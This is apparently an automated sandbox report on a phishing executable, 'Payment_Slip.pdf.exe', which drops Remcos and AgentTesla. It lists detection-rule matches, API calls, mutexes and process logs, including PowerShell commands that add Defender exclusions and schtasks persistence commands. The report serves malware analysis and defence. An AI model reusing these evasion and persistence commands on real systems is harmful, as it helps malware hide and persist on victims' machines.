Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: Payment_Slip.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mHTmhPhJy.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@33/34@6/7
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 14_2_004182CE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 11_2_00415C90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 16_2_00410DE1
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 17_2_00415C90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 14_2_00418758
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 11_2_0040E2E7
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource, 11_2_00419493
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_00418A00
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Mutant created: \Sessions\1\BaseNamedObjects\dEEtDNIXGrGLJw
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp2819.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Software\ 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Exe 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: (#G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Inj 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: 0"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: origmsc 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: H"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: exepath 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: H"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: exepath 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: !G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: licence 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: `"G 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: Administrator 17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Command line argument: User 17_2_0040D3F0
Source: Payment_Slip.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Payment_Slip.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe System information queried: HandleInformation
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000F.00000002.1222989805.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: conserver.exe, 0000000D.00000002.3619471195.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 0000000E.00000002.1244293689.0000000003098000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Payment_Slip.pdf.exe Virustotal: Detection: 45%
Source: Payment_Slip.pdf.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File read: C:\Users\user\Desktop\Payment_Slip.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe C:\Users\user\AppData\Roaming\mHTmhPhJy.exe
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: edputil.dll Jump to behavior
